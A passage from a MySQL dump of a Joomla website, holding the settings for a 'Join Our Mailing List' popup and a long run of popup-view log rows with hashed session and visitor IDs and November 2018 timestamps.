0.8)\",\"overlayclick\":\"1\",\"bgimage\":\"0\",\"bgimagefile\":\"\",\"bgrepeat\":\"Repeat\",\"bgsize\":\"Auto\",\"bgposition\":\"Left Top\",\"closebutton\":{\"hide\":\"0\",\"source\":\"icon\",\"color\":\"rgba(174, 174, 174, 1)\",\"hover\":\"rgba(128, 128, 128, 1)\",\"size\":\"22\",\"image\":\"\",\"delay\":\"0\"},\"assignmentMatchingMethod\":\"and\",\"assign_menu\":\"0\",\"assign_menu_param_noitem\":\"0\",\"assign_menu_param_inc_children\":\"0\",\"assign_urls\":\"0\",\"assign_urls_list\":\"\",\"assign_urls_param_regex\":\"0\",\"assign_datetime\":\"0\",\"assign_datetime_param_publish_up\":0,\"assign_datetime_param_publish_down\":0,\"assign_timerange\":\"0\",\"assign_timerange_param_publish_up\":\"\",\"assign_timerange_param_publish_down\":\"\",\"assign_usergroups\":\"0\",\"assign_user_id\":\"0\",\"assign_user_id_list\":\"\",\"assign_pageviews\":\"0\",\"assign_pageviews_list\":\"exactly\",\"assign_pageviews_param_views\":\"\",\"assign_onotherbox\":\"0\",\"assign_timeonsite\":\"0\",\"assign_timeonsite_list\":\"\",\"assign_devices\":\"0\",\"assign_browsers\":\"0\",\"assign_os\":\"0\",\"assign_geo_country\":\"0\",\"assign_geo_continent\":\"0\",\"assign_contentarticles\":\"0\",\"assign_contentarticles_list\":\"\",\"assign_contentcats\":\"0\",\"assign_contentcats_param_inc_children\":\"0\",\"assign_contentcats_param_inc\":[\"inc_articles\"],\"assign_k2_items\":\"0\",\"assign_k2_items_list\":\"\",\"assign_k2_items_param_cont_keywords\":\"\",\"assign_k2_items_param_meta_keywords\":\"\",\"assign_k2_cats\":\"0\",\"assign_k2_cats_param_inc_children\":\"0\",\"assign_k2_cats_param_inc\":[\"inc_items\"],\"assign_k2_tags\":\"0\",\"assign_k2_pagetypes\":\"0\",\"assign_components\":\"0\",\"assign_lang\":\"0\",\"assign_convertforms\":\"0\",\"assign_referrer\":\"0\",\"assign_referrer_list\":\"\",\"assign_ip_addresses\":\"0\",\"assign_ip_addresses_list\":\"\",\"assign_cookiename\":\"0\",\"assign_cookiename_param_name\":\"\",\"assign_cookiename_list\":\"exists\",\"assign_cookiename_param_content\":\"\",\"assign_php\":\"0\",\"assign_php_list\":\"\",\"customcode\":\"\",\"customcss\":\"\",\"rtl\":\"2\",\"preventpagescroll\":\"2\",\"stats\":\"\",\"assign_offline\":\"\",\"classsuffix\":\"\",\"zindex\":\"\",\"welcomemat\":\"1\",\"showtitle\":\"0\",\"note\":\"\",\"colorgroup\":\"none\"}', -2),
(2, 'Join Our Mailing List', 0, 'custom', '{convertforms 1}', 'bottom-left', 'pageload', 30, '{\"triggerelement\":\"\",\"triggerpercentage\":\"80\",\"triggerdelay\":\"0\",\"preventdefault\":\"1\",\"exittimer\":\"1000\",\"hashtag\":\"\",\"assign_impressions\":\"0\",\"assign_impressions_list\":\"3\",\"assign_impressions_param_type\":\"session\",\"closeopened\":\"0\",\"cookietype\":\"never\",\"animationin\":\"rstbox.slideUpIn\",\"animationout\":\"rstbox.slideUpOut\",\"duration\":\"400\",\"autohide\":\"1\",\"autoclose\":\"0\",\"autoclosevalue\":\"0\",\"width\":\"500px\",\"height\":\"auto\",\"padding\":\"20px\",\"textcolor\":\"rgba(51, 51, 51, 1)\",\"backgroundcolor\":\"rgba(255, 255, 255, 1)\",\"aligncontent\":\"\",\"boxshadow\":\"2\",\"bordertype\":\"none\",\"bordercolor\":\"rgba(199, 44, 44, 1)\",\"borderwidth\":\"5px\",\"borderradius\":\"0px\",\"overlay\":\"0\",\"overlay_color\":\"rgba(0, 0, 0, 0.8)\",\"overlayclick\":\"1\",\"bgimage\":\"0\",\"bgimagefile\":\"\",\"bgrepeat\":\"Repeat\",\"bgsize\":\"Auto\",\"bgposition\":\"Left Top\",\"closebutton\":{\"hide\":\"0\",\"source\":\"icon\",\"color\":\"rgba(174, 174, 174, 1)\",\"hover\":\"rgba(128, 128, 128, 1)\",\"size\":\"22\",\"image\":\"\",\"delay\":\"0\"},\"assignmentMatchingMethod\":\"and\",\"assign_menu\":\"0\",\"assign_menu_param_noitem\":\"0\",\"assign_menu_param_inc_children\":\"0\",\"assign_urls\":\"0\",\"assign_urls_list\":\"\",\"assign_urls_param_regex\":\"0\",\"assign_datetime\":\"0\",\"assign_datetime_param_publish_up\":0,\"assign_datetime_param_publish_down\":0,\"assign_timerange\":\"0\",\"assign_timerange_param_publish_up\":\"\",\"assign_timerange_param_publish_down\":\"\",\"assign_usergroups\":\"0\",\"assign_user_id\":\"0\",\"assign_user_id_list\":\"\",\"assign_pageviews\":\"0\",\"assign_pageviews_list\":\"exactly\",\"assign_pageviews_param_views\":\"\",\"assign_onotherbox\":\"0\",\"assign_timeonsite\":\"0\",\"assign_timeonsite_list\":\"\",\"assign_devices\":\"0\",\"assign_browsers\":\"0\",\"assign_os\":\"0\",\"assign_geo_country\":\"0\",\"assign_geo_continent\":\"0\",\"assign_contentarticles\":\"0\",\"assign_contentarticles_list\":\"\",\"assign_contentcats\":\"0\",\"assign_contentcats_param_inc_children\":\"0\",\"assign_contentcats_param_inc\":[\"inc_articles\"],\"assign_k2_items\":\"0\",\"assign_k2_items_list\":\"\",\"assign_k2_items_param_cont_keywords\":\"\",\"assign_k2_items_param_meta_keywords\":\"\",\"assign_k2_cats\":\"0\",\"assign_k2_cats_param_inc_children\":\"0\",\"assign_k2_cats_param_inc\":[\"inc_items\"],\"assign_k2_tags\":\"0\",\"assign_k2_pagetypes\":\"0\",\"assign_components\":\"0\",\"assign_lang\":\"0\",\"assign_convertforms\":\"0\",\"assign_referrer\":\"0\",\"assign_referrer_list\":\"\",\"assign_ip_addresses\":\"0\",\"assign_ip_addresses_list\":\"\",\"assign_cookiename\":\"0\",\"assign_cookiename_param_name\":\"\",\"assign_cookiename_list\":\"exists\",\"assign_cookiename_param_content\":\"\",\"assign_php\":\"0\",\"assign_php_list\":\"\",\"customcode\":\"\",\"customcss\":\"\",\"rtl\":\"2\",\"preventpagescroll\":\"2\",\"stats\":\"\",\"assign_offline\":\"\",\"classsuffix\":\"\",\"zindex\":\"\",\"welcomemat\":\"0\",\"showtitle\":\"1\",\"note\":\"\",\"colorgroup\":\"none\"}', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_rstbox_logs`
--

CREATE TABLE `y57u5_rstbox_logs` (
  `id` int(11) NOT NULL,
  `sessionid` varchar(64) NOT NULL,
  `visitorid` varchar(64) NOT NULL,
  `user` int(11) NOT NULL,
  `box` int(11) NOT NULL,
  `event` tinyint(6) NOT NULL DEFAULT '1',
  `date` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_rstbox_logs`
--

INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(29628, '86f73616d0c995b69ab07ab223f290d4', '4a71d43b3b33af48', 0, 2, 1, '2018-11-11 17:11:59'),
(29629, '86f73616d0c995b69ab07ab223f290d4', '4a71d43b3b33af48', 0, 2, 1, '2018-11-11 17:12:03'),
(29630, 'e1a71c621376b41a8ab034e3d552f8b1', 'e94b949638bf6bed', 0, 2, 1, '2018-11-11 17:12:59'),
(29631, '65f9c11a8ea4fa80379be01c410b3004', 'e94b949638bf6bed', 0, 2, 1, '2018-11-11 17:13:17'),
(29632, 'a48d43c2677601a25ea365980b8b907c', 'c92466dc4cb16cf9', 0, 2, 1, '2018-11-11 17:35:22'),
(29633, '0a5d29b02a01267c9931540b60a7a39b', '244d778d9ec41aa8', 0, 2, 1, '2018-11-11 17:36:34'),
(29634, '4e6cd815ab37fbffb215d9eb5dced075', '30f2212981adef2f', 0, 2, 1, '2018-11-11 17:41:35'),
(29635, '106516e3ec836bda5ea8e4ec1427a757', '11dac0eba05d0744', 0, 2, 1, '2018-11-11 17:45:53'),
(29636, '068b791fb44df16dd4c40629c2d9dd36', '7d4aa9e706e82bcf', 0, 2, 1, '2018-11-11 17:48:34'),
(29637, '440bda044a660e93a92a1f835e2c8b39', '77d629067fed3a03', 0, 2, 1, '2018-11-11 18:26:44'),
(29638, '2201e6f4be10f2d2f06264928af7c9b1', 'ba32395289361d31', 0, 2, 1, '2018-11-11 18:31:54'),
(29639, 'd31a5612fa7749084fd9f6d04f494b86', '6f77ba2871cc69eb', 0, 2, 1, '2018-11-11 18:41:52'),
(29640, '0f692f1e77e0cfd52ffd98743c6107dc', 'f6ebbb722fb4d0d0', 0, 2, 1, '2018-11-11 19:07:41'),
(29641, '1af1b0e136c5c1fd17148fce712ffd7c', 'a4d9d8225838853d', 0, 2, 1, '2018-11-11 19:11:57'),
(29642, 'e765c995e5c8da5087058a2e85a60df3', '275790b1c76173bb', 0, 2, 1, '2018-11-11 19:47:50'),
(29643, '4bac37469a54775fc278868fa230dc9f', 'e839b8d92f4dc371', 0, 2, 1, '2018-11-11 19:48:11'),
(29644, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 19:52:33'),
(29645, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 19:52:40'),
(29646, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 19:52:57'),
(29647, 'a6cdbf9cc1781f68ff2bfdb4e2a3014d', '9d7e91466402b84a', 0, 2, 1, '2018-11-11 19:59:21'),
(29648, 'a6cdbf9cc1781f68ff2bfdb4e2a3014d', '9d7e91466402b84a', 0, 2, 1, '2018-11-11 20:00:23'),
(29649, '952ce777e5df24dc3613f2bc1a8d1908', '5b7ff610e8156404', 0, 2, 1, '2018-11-11 20:05:13'),
(29650, '952ce777e5df24dc3613f2bc1a8d1908', '5b7ff610e8156404', 0, 2, 1, '2018-11-11 20:06:16'),
(29651, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-11 20:08:38'),
(29652, '952ce777e5df24dc3613f2bc1a8d1908', '5b7ff610e8156404', 0, 2, 1, '2018-11-11 20:13:15'),
(29653, '952ce777e5df24dc3613f2bc1a8d1908', '5b7ff610e8156404', 0, 2, 1, '2018-11-11 20:14:22'),
(29654, '98c5331dddc7a2b15c8a98f099061138', '9b3839f55ae86966', 0, 2, 1, '2018-11-11 20:15:03'),
(29655, '21a3810dfdb16fd6b5dcb8d483870de5', '112183ae2636ecde', 0, 2, 1, '2018-11-11 20:28:22'),
(29656, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-11 20:33:24'),
(29657, 'a35efe5c0cb8f149543766cd3da46f4d', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 20:34:02'),
(29658, 'a35efe5c0cb8f149543766cd3da46f4d', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 20:36:22'),
(29659, 'e4e8a088f2492c2dd5f6352280e7d5f3', 'df27b9a2919a8206', 0, 2, 1, '2018-11-11 20:37:13'),
(29660, 'e4e8a088f2492c2dd5f6352280e7d5f3', 'df27b9a2919a8206', 0, 2, 1, '2018-11-11 20:37:14'),
(29661, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-11 20:37:34'),
(29662, '21a3810dfdb16fd6b5dcb8d483870de5', '112183ae2636ecde', 0, 2, 1, '2018-11-11 20:37:42'),
(29663, 'c58e262517c4cd0b1187fd3887bc692a', '5d05c790f4830fad', 0, 2, 1, '2018-11-11 20:38:17'),
(29664, 'f7a8c4b5e03f120fd12b47218fbc6d6f', '15b0a2cb49730d51', 0, 2, 1, '2018-11-11 20:38:20'),
(29665, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-11 20:39:26'),
(29666, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 20:40:46'),
(29667, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 20:42:43'),
(29668, '9da70f9187b9fa52ca0363c58e576870', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-11 20:42:55'),
(29669, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 20:43:18'),
(29670, 'a35efe5c0cb8f149543766cd3da46f4d', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 20:44:51'),
(29671, 'e4e8a088f2492c2dd5f6352280e7d5f3', 'df27b9a2919a8206', 0, 2, 1, '2018-11-11 20:46:12'),
(29672, 'd32baf3ed44cbb83432a2575b05cd066', '5b7c92699dfebf33', 0, 2, 1, '2018-11-11 20:46:29'),
(29673, 'a53834dfbec03f108c886ff03447a976', '3de88ff4581dab27', 0, 2, 1, '2018-11-11 20:48:36'),
(29674, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:50:31'),
(29675, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:50:43'),
(29676, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:52:12'),
(29677, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:52:33'),
(29678, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:53:00'),
(29679, '59f5bf574f8e9e6336500a6f0bc97838', '0eafff4de1dbd711', 0, 2, 1, '2018-11-11 20:53:23'),
(29680, 'a95a4d71e918e2e016fad06f46580a2e', 'abc5ec7aefe03208', 0, 2, 1, '2018-11-11 20:53:30'),
(29681, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 20:55:01'),
(29682, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 20:55:57'),
(29683, 'c58e262517c4cd0b1187fd3887bc692a', '5d05c790f4830fad', 0, 2, 1, '2018-11-11 20:56:28'),
(29684, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 21:02:24'),
(29685, '9e2d268dc1b1e2cd3b02107da5c45ff0', 'c0defd348886c5c2', 0, 2, 1, '2018-11-11 21:02:40'),
(29686, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-11 21:06:07'),
(29687, 'a95a4d71e918e2e016fad06f46580a2e', 'abc5ec7aefe03208', 0, 2, 1, '2018-11-11 21:07:11'),
(29688, 'a53834dfbec03f108c886ff03447a976', '3de88ff4581dab27', 0, 2, 1, '2018-11-11 21:10:04'),
(29689, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:17:40'),
(29690, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 21:21:12'),
(29691, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 21:21:48'),
(29692, 'bc3df266fcb879d8942d8638ff399e94', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 21:21:59'),
(29693, 'e75dc514f61b9e75292e846a38e1d8c9', '819477a20772ca36', 0, 2, 1, '2018-11-11 21:22:44'),
(29694, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 21:22:50'),
(29695, '2f842d56fb640e39dd0d08871e81bfb7', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 21:24:31'),
(29696, 'a5452155da77d17b91c75ae741f47fbf', '4574603cf07e6399', 0, 2, 1, '2018-11-11 21:24:52'),
(29697, '227b8c07ccd5ce4e16995f0b0f9039eb', '71017ba1c1aba900', 0, 2, 1, '2018-11-11 21:27:50'),
(29698, '2f842d56fb640e39dd0d08871e81bfb7', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 21:29:02'),
(29699, '88b3a53be613c84ce9eeaed9477141c6', 'dceb54d1f5ea3569', 0, 2, 1, '2018-11-11 21:29:52'),
(29700, 'a5452155da77d17b91c75ae741f47fbf', '4574603cf07e6399', 0, 2, 1, '2018-11-11 21:30:40'),
(29701, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:33:27'),
(29702, '88b3a53be613c84ce9eeaed9477141c6', 'dceb54d1f5ea3569', 0, 2, 1, '2018-11-11 21:37:42'),
(29703, '67056b43fc5fc6e8073b4b084f1b008e', '580516ce999d9d2e', 0, 2, 1, '2018-11-11 21:43:10'),
(29704, 'c1bc4c5021ddd277eb6cd651752173f6', '9d954b8da61d303c', 0, 2, 1, '2018-11-11 21:43:59'),
(29705, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:48:43'),
(29706, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:48:59'),
(29707, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 21:49:20'),
(29708, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:49:28'),
(29709, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:49:52'),
(29710, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 21:53:24'),
(29711, 'a95a4d71e918e2e016fad06f46580a2e', 'abc5ec7aefe03208', 0, 2, 1, '2018-11-11 21:59:02'),
(29712, '56d46e0897838c78413a117cbfec50a0', '14cb28e263fc2409', 0, 2, 1, '2018-11-11 22:04:48'),
(29713, '86fe18c75a0f4b964504c1c0e5e439d9', '377a73c8f0a1ad18', 0, 2, 1, '2018-11-11 22:05:02'),
(29714, '1d92078eac4d1f3185800f99e55b9d9a', 'b3572442b61928b3', 0, 2, 1, '2018-11-11 22:14:43'),
(29715, '650e017a0a378fd7ef3b6d134b3609f1', '3a2c608ca58ceabc', 0, 2, 1, '2018-11-11 22:16:36'),
(29716, 'd32baf3ed44cbb83432a2575b05cd066', '5b7c92699dfebf33', 0, 2, 1, '2018-11-11 22:22:11'),
(29717, '96752f1113cf521bbf912c686dc28a51', '76cff38de2f9557f', 0, 2, 1, '2018-11-11 22:23:06'),
(29718, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-11 22:23:17'),
(29719, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-11 22:23:25'),
(29720, 'a740a0425bedb08d8d21e0d466ba2e6f', 'e562466eaaad4d6c', 0, 2, 1, '2018-11-11 22:25:01'),
(29721, '56d46e0897838c78413a117cbfec50a0', '14cb28e263fc2409', 0, 2, 1, '2018-11-11 22:26:08'),
(29722, 'b56480c5b7f0444c7a31d52d1a011980', '6f0250b566b9c530', 0, 2, 1, '2018-11-11 22:26:45'),
(29723, 'a740a0425bedb08d8d21e0d466ba2e6f', 'e562466eaaad4d6c', 0, 2, 1, '2018-11-11 22:29:05'),
(29724, '650e017a0a378fd7ef3b6d134b3609f1', '3a2c608ca58ceabc', 0, 2, 1, '2018-11-11 22:31:17'),
(29725, 'a740a0425bedb08d8d21e0d466ba2e6f', 'e562466eaaad4d6c', 0, 2, 1, '2018-11-11 22:34:54'),
(29726, 'd2d219b44336f01595197e8cdb0bca17', '4574603cf07e6399', 0, 2, 1, '2018-11-11 22:35:56'),
(29727, 'a6cdbf9cc1781f68ff2bfdb4e2a3014d', '9d7e91466402b84a', 0, 2, 1, '2018-11-11 22:38:45'),
(29728, 'c58e262517c4cd0b1187fd3887bc692a', '5d05c790f4830fad', 0, 2, 1, '2018-11-11 22:39:53'),
(29729, 'a6cdbf9cc1781f68ff2bfdb4e2a3014d', '9d7e91466402b84a', 0, 2, 1, '2018-11-11 22:40:02'),
(29730, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:40:39'),
(29731, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 22:40:50'),
(29732, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:41:09'),
(29733, 'cb04cfdf6bc9ca67a906d402de26ee93', '7ec969d351bcf68e', 0, 2, 1, '2018-11-11 22:42:28'),
(29734, 'cb04cfdf6bc9ca67a906d402de26ee93', '7ec969d351bcf68e', 0, 2, 1, '2018-11-11 22:43:13'),
(29735, '415cee85701982e93b32f9e667efcdba', '23049512446aa4dd', 0, 2, 1, '2018-11-11 22:43:37'),
(29736, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:45:50'),
(29737, 'cb04cfdf6bc9ca67a906d402de26ee93', '7ec969d351bcf68e', 0, 2, 1, '2018-11-11 22:46:02'),
(29738, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:46:05'),
(29739, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 22:46:06'),
(29740, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:46:14'),
(29741, 'c58e262517c4cd0b1187fd3887bc692a', '5d05c790f4830fad', 0, 2, 1, '2018-11-11 22:46:23'),
(29742, 'cb04cfdf6bc9ca67a906d402de26ee93', '7ec969d351bcf68e', 0, 2, 1, '2018-11-11 22:46:35'),
(29743, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:46:41'),
(29744, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 22:46:51'),
(29745, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:47:07'),
(29746, '88b3a53be613c84ce9eeaed9477141c6', 'dceb54d1f5ea3569', 0, 2, 1, '2018-11-11 22:47:19'),
(29747, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:47:50'),
(29748, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 22:48:12'),
(29749, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-11 22:49:34'),
(29750, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-11 22:49:41'),
(29751, 'e4e8a088f2492c2dd5f6352280e7d5f3', 'df27b9a2919a8206', 0, 2, 1, '2018-11-11 22:50:56'),
(29752, '4fb111ee43ef683c5dd0aedd323c4e19', '66a7109bf18fc67a', 0, 2, 1, '2018-11-11 22:53:02'),
(29753, 'd32176d30ddbae638f9a7ca3596de9f9', '3e53f700064aedd2', 0, 2, 1, '2018-11-11 22:56:19'),
(29754, 'd32176d30ddbae638f9a7ca3596de9f9', '3e53f700064aedd2', 0, 2, 1, '2018-11-11 22:57:56'),
(29755, 'd32176d30ddbae638f9a7ca3596de9f9', '3e53f700064aedd2', 0, 2, 1, '2018-11-11 22:58:38'),
(29756, 'd32176d30ddbae638f9a7ca3596de9f9', '3e53f700064aedd2', 0, 2, 1, '2018-11-11 22:59:39'),
(29757, 'd32176d30ddbae638f9a7ca3596de9f9', '3e53f700064aedd2', 0, 2, 1, '2018-11-11 22:59:59'),
(29758, '04364f3e9b187a803d4c0422fd0bc195', 'd8923e60c6dca0dc', 0, 2, 1, '2018-11-11 23:01:53'),
(29759, 'a740a0425bedb08d8d21e0d466ba2e6f', 'e562466eaaad4d6c', 0, 2, 1, '2018-11-11 23:03:02'),
(29760, '86f73616d0c995b69ab07ab223f290d4', '4a71d43b3b33af48', 0, 2, 1, '2018-11-11 23:05:27'),
(29761, '86f73616d0c995b69ab07ab223f290d4', '4a71d43b3b33af48', 0, 2, 1, '2018-11-11 23:07:33'),
(29762, '4530f43bdbd324695cd1578b2a2f4b29', '97638b20ddb580d8', 0, 2, 1, '2018-11-11 23:11:03'),
(29763, '650e017a0a378fd7ef3b6d134b3609f1', '3a2c608ca58ceabc', 0, 2, 1, '2018-11-11 23:12:59'),
(29764, 'afdfff69533a439e467762926c8ac7b8', '04e91e5025979815', 0, 2, 1, '2018-11-11 23:23:36'),
(29765, 'dfc27639e3bd3ca5411614ca894c17e7', '11dac0eba05d0744', 0, 2, 1, '2018-11-11 23:32:34'),
(29766, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-11-11 23:38:32'),
(29767, '8f1bc0c6b4de1d0e6bbc652301ebb0dd', 'e793b6887430710e', 0, 2, 1, '2018-11-11 23:41:39'),
(29768, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 23:46:46'),
(29769, '7e74bc05d1c6554275002f3422d6b77f', '819477a20772ca36', 0, 2, 1, '2018-11-11 23:47:24'),
(29770, '64aa412b3465e4ebae634284ed1814b8', '574f64490fa2f7bf', 0, 2, 1, '2018-11-11 23:47:36'),
(29771, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 23:53:03'),
(29772, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 23:53:25'),
(29773, '17472e12bebf88ea4ecc6618369c9ffa', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-11 23:53:41'),
(29774, '8e9335d2c633eadd39b91ccba0da244a', '8e0589df61cad931', 0, 2, 1, '2018-11-11 23:54:03'),
(29775, '6017c00b4d132e63399f47ac3456ed25', '12ed21842ec29d17', 0, 2, 1, '2018-11-11 23:54:26'),
(29776, 'f5971f037e3a520d8c858f49bab0858a', '359d8b6b848927ab', 0, 2, 1, '2018-11-11 23:54:31'),
(29777, '748c05cd7b73a5ef0d7d2d6570ca9200', 'd8923e60c6dca0dc', 0, 2, 1, '2018-11-11 23:55:14'),
(29778, 'a95a4d71e918e2e016fad06f46580a2e', 'abc5ec7aefe03208', 0, 2, 1, '2018-11-11 23:56:23'),
(29779, '9edf1861274ee7a8fd593046bcda78e3', '3a2c608ca58ceabc', 0, 2, 1, '2018-11-12 00:13:31'),
(29780, '9e48e84232645986e02932b0b77c359e', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-12 00:14:41'),
(29781, '6ae5b1d808d7b52b0c5cd52aaf2c79c3', 'a19ac8b052edcc15', 0, 2, 1, '2018-11-12 00:21:14'),
(29782, 'dfc27639e3bd3ca5411614ca894c17e7', '11dac0eba05d0744', 0, 2, 1, '2018-11-12 00:25:28'),
(29783, '3b4f6b6e5802272a39969d9aa3981ed9', '377a73c8f0a1ad18', 0, 2, 1, '2018-11-12 00:27:43'),
(29784, '40836fcba0259b28bb42d13555dd39c0', '4ba0357d5ee0e29e', 0, 2, 1, '2018-11-12 00:30:10'),
(29785, 'c9add41a58eef85c9ead03ec127c2d4d', 'a2088746fcbb32e6', 0, 2, 1, '2018-11-12 00:30:11'),
(29786, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-12 00:37:06'),
(29787, 'a95a4d71e918e2e016fad06f46580a2e', 'abc5ec7aefe03208', 0, 2, 1, '2018-11-12 00:37:56'),
(29788, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-12 00:43:51'),
(29789, 'eed85d8861ebdeaef0cca6041f4234fc', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-12 00:54:12'),
(29790, 'a6cdbf9cc1781f68ff2bfdb4e2a3014d', '9d7e91466402b84a', 0, 2, 1, '2018-11-12 00:54:51'),
(29791, '25b30efa27616b8d1e3cc2553042829d', 'e68f0e56ec9d1833', 0, 2, 1, '2018-11-12 00:55:18'),
(29792, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-12 00:55:47'),
(29793, 'be06687b56be3351f2f5ad58eef7190a', '91fa2496bddb048f', 0, 2, 1, '2018-11-12 01:00:55'),
(29794, '3b4f6b6e5802272a39969d9aa3981ed9', '377a73c8f0a1ad18', 0, 2, 1, '2018-11-12 01:03:08'),
(29795, '3b4f6b6e5802272a39969d9aa3981ed9', '377a73c8f0a1ad18', 0, 2, 1, '2018-11-12 01:03:17'),
(29796, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-12 01:16:15'),
(29797, '256ef94f4b6bfb8c5f8d3ea361b3b4a6', '168b2151c20a34b6', 0, 2, 1, '2018-11-12 01:41:49'),
(29798, 'c9c04f4d2dca8ca9c638a4c34613399b', '32cd5ee0592c3279', 0, 2, 1, '2018-11-12 01:49:21'),
(29799, 'c17bfeabf432afb3508ecb3e02a45947', '84c73015e9e28e8a', 0, 2, 1, '2018-11-12 01:54:33'),
(29800, 'e716a9ea0a8857eeafe1069a62599716', 'ee0826f8778c48c2', 0, 2, 1, '2018-11-12 02:38:34'),
(29801, '24e420261e89a5b712de64e7cc3463dd', '00d281101604412f', 0, 2, 1, '2018-11-12 02:59:17'),
